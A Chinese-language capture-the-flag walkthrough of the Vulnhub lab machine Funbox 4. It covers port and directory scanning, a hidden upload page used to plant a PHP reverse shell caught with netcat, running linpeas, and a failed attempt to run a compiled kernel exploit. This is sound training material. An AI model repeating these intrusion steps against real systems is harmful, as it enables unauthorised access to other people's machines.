Vulnhub之Funbox 4靶机详细测试过程(由于缺包,提权失败)
Funbox 4
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:6d:38 1 60 PCS Systemtechnik GmbH
192.168.56.161 08:00:27:ca:ad:e9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.161
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 03:28 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
| 256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_ 256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES AUTH-RESP-CODE SASL TOP PIPELINING CAPA
143/tcp open imap Dovecot imapd
|_imap-capabilities: OK LOGIN-REFERRALS more LOGINDISABLEDA0001 listed LITERAL+ post-login SASL-IR IMAP4rev1 ENABLE have capabilities Pre-login ID IDLE
MAC Address: 08:00:27:CA:AD:E9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、110(POP3)、143(IMAP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ nikto -h http://192.168.56.161
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.161
+ Target Hostname: 192.168.56.161
+ Target Port: 80
+ Start Time: 2023-01-09 03:31:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-01-09 03:32:48 (GMT-5) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.161
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: html,js,php,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/09 03:34:41 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1322667 / 1323366 (99.95%)
===============================================================
2023/01/09 03:42:22 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ dirb http://192.168.56.161
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jan 9 03:42:28 2023
URL_BASE: http://192.168.56.161/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.161/ ----
+ http://192.168.56.161/index.html (CODE:200|SIZE:11321)
+ http://192.168.56.161/server-status (CODE:403|SIZE:302)
-----------------
END_TIME: Mon Jan 9 03:42:31 2023
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.sh,.txt,.html,.js
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.sh,.txt,.html,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.161
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: html,js,php,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/09 03:42:55 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 302]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
Progress: 134847 / 373710 (36.08%)[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.sh": net/url: invalid control character in URL
Progress: 142674 / 373710 (38.18%)[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.js": net/url: invalid control character in URL
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 11321]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
Progress: 373419 / 373710 (99.92%)
===============================================================
2023/01/09 03:45:01 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.sh,.txt,.html,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.161
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,html,js,php,sh
[+] Timeout: 10s
===============================================================
2023/01/09 03:45:21 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 298]
/.htaccess.sh (Status: 403) [Size: 301]
/.htaccess.php (Status: 403) [Size: 302]
/.htaccess.html (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 298]
/.htpasswd.txt (Status: 403) [Size: 302]
/.htpasswd.sh (Status: 403) [Size: 301]
/.htaccess.js (Status: 403) [Size: 301]
/.htpasswd.php (Status: 403) [Size: 302]
/.htpasswd.html (Status: 403) [Size: 303]
/.htaccess.txt (Status: 403) [Size: 302]
/.htpasswd.js (Status: 403) [Size: 301]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 302]
Progress: 122093 / 122862 (99.37%)
===============================================================
2023/01/09 03:46:02 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.sh,.txt,.html,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.161
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,sh,txt,html,js
[+] Timeout: 10s
===============================================================
2023/01/09 03:46:11 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 293]
/.hta.html (Status: 403) [Size: 298]
/.hta.js (Status: 403) [Size: 296]
/.hta.sh (Status: 403) [Size: 296]
/.htaccess.js (Status: 403) [Size: 301]
/.htaccess.txt (Status: 403) [Size: 302]
/.htaccess (Status: 403) [Size: 298]
/.hta.txt (Status: 403) [Size: 297]
/.hta.php (Status: 403) [Size: 297]
/.htaccess.sh (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 298]
/.htaccess.php (Status: 403) [Size: 302]
/.htaccess.html (Status: 403) [Size: 303]
/.htpasswd.sh (Status: 403) [Size: 301]
/.htpasswd.php (Status: 403) [Size: 302]
/.htpasswd.txt (Status: 403) [Size: 302]
/.htpasswd.html (Status: 403) [Size: 303]
/.htpasswd.js (Status: 403) [Size: 301]
/index.html (Status: 200) [Size: 11321]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 302]
Progress: 27343 / 28284 (96.67%)
===============================================================
2023/01/09 03:46:21 Finished
===============================================================
目录扫描一无所获。看了其他人的做法,是作者给出的以下提示:
Groundhog Day: Boot2Root !
Initial footstep is a bit flowed, but really not difficult.
After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2 and easy to find) hints.
Be smart and combine...
Hints: Nikto scans "case sensitive" and you need a minimum of 15 mins to get user !
If you need hints, call me on twitter: @0815R2d2
Have fun...
作者提示目录文件时大小写敏感的,因此需要尝试一下ROBOTS.TXT文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.161/ROBOTS.TXT
Disallow: upload/
Disallow: igmseklhgmrjmtherij2145236
当访问第2个目录的时候,
Forbidden
You don't have permission to access /igmseklhgmrjmtherij2145236/ on this server.
这表明上述目录下有文件或者目录,不能直接访问:
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.161/igmseklhgmrjmtherij2145236/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,txt,html,sh,js
[+] Timeout: 10s
===============================================================
2023/01/09 03:54:17 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 321]
/.php (Status: 403) [Size: 320]
/upload (Status: 301) [Size: 344] [--> http://192.168.56.161/igmseklhgmrjmtherij2145236/upload/]
/upload.html (Status: 200) [Size: 297]
/upload.php (Status: 200) [Size: 319]
Progress: 46232 / 1323366 (3.49%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/09 03:54:31 Finished
===============================================================
/upload.php可以上传文件
将shell.php上传至目标主机(没有任何限制)
访问:
http://192.168.56.161/igmseklhgmrjmtherij2145236/upload/shell.php
成功得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.161] 46542
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:58:12 up 32 min, 0 users, load average: 0.48, 1.82, 3.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29 2020 .
drwxr-xr-x 23 root root 4.0K Jan 9 09:55 ..
drwx------ 4 anna anna 4.0K Aug 30 2020 anna
drwxr-xr-x 4 thomas thomas 4.0K Aug 30 2020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 30 2020 .
drwxr-xr-x 4 root root 4.0K Aug 29 2020 ..
-rw------- 1 thomas thomas 46 Aug 30 2020 .bash_history
-rw-r--r-- 1 thomas thomas 220 Aug 29 2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 29 2020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 29 2020 .cache
-rw-r--r-- 1 thomas thomas 675 Aug 29 2020 .profile
drwx------ 2 thomas thomas 4.0K Aug 30 2020 .ssh
-rw-r--r-- 1 thomas thomas 195 Aug 29 2020 .todo
-rw------- 1 thomas thomas 1.3K Aug 30 2020 .viminfo
-rw-rw-r-- 1 thomas thomas 217 Aug 30 2020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 22 2019 pspy64
www-data@funbox4:/home/thomas$ cd .ssh
cd .ssh
bash: cd: .ssh: Permission denied
www-data@funbox4:/home/thomas$ cat .todo
cat .todo
1. make coffee
2. check backup
3. buy ram
4. call simone
5. check my mails
6. call lucas
7. add an exclamation mark to my passwords
.
.
.
.
.
.
100. learn to read emails without a gui-client !!!
www-data@funbox4:/home/thomas$
www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here.
I doesnt look forward to see this in the writeups/walktroughs,
but this is murpys law !
Now, rockyou.txt isnt your friend. Its a little sed harder :-)
If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
Bit more ?
Tm8gaGludHMgaGVyZSAhCg==
Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====
www-data@funbox4:/$
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.
用在线网站:
https://ctf.bugku.com/tool/brainfuck
解密得到:
The next hint is located in:
┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'Tm8gaGludHMgaGVyZSAhCg==' | base64 -d
No hints here !
┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base64 -d
(Ԗ
��43}�����8��base64: invalid input
┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base32 -d
Search for todos.
接下来上传linpeas.sh脚本到目标主机
www-data@funbox4:/tmp$ wget http://192.168.56.146:8000/linpeas.sh
wget http://192.168.56.146:8000/linpeas.sh
The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget'
www-data@funbox4:/tmp$ which curl
但是目标主机没有wget或者curl,不过可以利用前面的upload.php实现上传
上传成功后mv到/tmp目录
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236$ cd upload
cd upload
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -alh
ls -alh
total 764K
drwxrwxrwx 2 root root 4.0K Jan 10 02:50 .
drwxr-xr-x 3 root root 4.0K Aug 29 2020 ..
-rw-r--r-- 1 www-data www-data 748K Jan 10 02:50 linpeas.sh
-rw-r--r-- 1 www-data www-data 5.4K Jan 9 09:57 shell.php
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ mv linpeas.sh /tmp
<tml/igmseklhgmrjmtherij2145236/upload$ mv linpeas.sh /tmp
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /tmp
cd /tmp
www-data@funbox4:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@funbox4:/tmp$ ls
ls
linpeas.sh
systemd-private-769b1209417348f8a413f39ddc14681b-dovecot.service-LxciIz
systemd-private-769b1209417348f8a413f39ddc14681b-systemd-timesyncd.service-XVpt1a
www-data@funbox4:/tmp$
执行linpeas.sh脚本:
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
将漏洞利用代码通过前面的http方式上传
┌──(kali㉿kali)-[~]
└─$ cd ~/Desktop/Vulnhub/Funbox4
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ mv ~/Downloads/40871.c .
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c linpeas.sh nmap_full_scan shell.php
www-data@funbox4:/usr/bin$ ls -lha | grep gcc
ls -lha | grep gcc
www-data@funbox4:/usr/bin$ ls -alh /usr/bin/gcc-5
ls -alh /usr/bin/gcc-5
ls: cannot access '/usr/bin/gcc-5': No such file or directory
www-data@funbox4:/usr/bin$
www-data@funbox4:/usr/bin$ cd /usr/share/gcc-5
cd /usr/share/gcc-5
www-data@funbox4:/usr/share/gcc-5$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 29 2020 .
drwxr-xr-x 125 root root 4.0K Aug 29 2020 ..
drwxr-xr-x 3 root root 4.0K Aug 29 2020 python
www-data@funbox4:/usr/share/gcc-5$ cd python
cd python
虽然Linpeas.sh脚本输出结果中有gcc-5编译工具,但是却发现无法使用。
可以在Kali linux本地编译完成以后再上传
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c linpeas.sh nmap_full_scan shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gcc -o exploit 40871.c
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c exploit linpeas.sh nmap_full_scan shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
www-data@funbox4:/tmp$ ./exploit
./exploit
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./exploit)
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit)
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit)
提权失败
STRIVE FOR PROGRESS,NOT FOR PERFECTION